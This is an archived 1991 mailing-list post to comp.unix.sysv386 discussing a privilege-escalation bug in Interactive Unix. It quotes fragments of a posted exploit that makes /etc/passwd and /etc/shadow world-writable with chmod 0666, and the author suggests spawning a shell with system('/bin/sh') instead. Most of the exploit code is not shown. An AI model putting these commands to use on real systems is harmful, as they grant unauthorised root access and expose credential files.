SECURITY BUG IN INTERACTIVE UNIX SYSV386 (REPOST)
Heinrich Schnermann
hsch at influx.sub.org
Mon Feb 18 00:07:09 AEST 1991
lumpi at dobag.in-berlin.de (Joern Lubkoll) writes:
>/* If you use Interactive Unix 2.2 uncomment the following line */
>/* #define ISC22 */
[15 lines of includes, ifdefs and defines follow]
What do you think about a shorter version like this?
#include <sys/types.h>
#include <sys/signal.h>
#include <sys/dir.h>
#include <sys/user.h>
Runs on Interactive 2.02 *and* 2.2.
> chmod ("/etc/passwd",(int) 0666);
> chmod ("/etc/shadow",(int) 0666);
Not very nice, even in Lumpi's compiled version. A little
system("/bin/sh");
instead of chmod wouldn't change anything and would be quite more
easy to handle.
Heinrich
--
Heinrich Schnermann, Wichmannstr.26, 3000 Hannover 81, +49 511 835 603
More information about the Comp.unix.sysv386
mailing list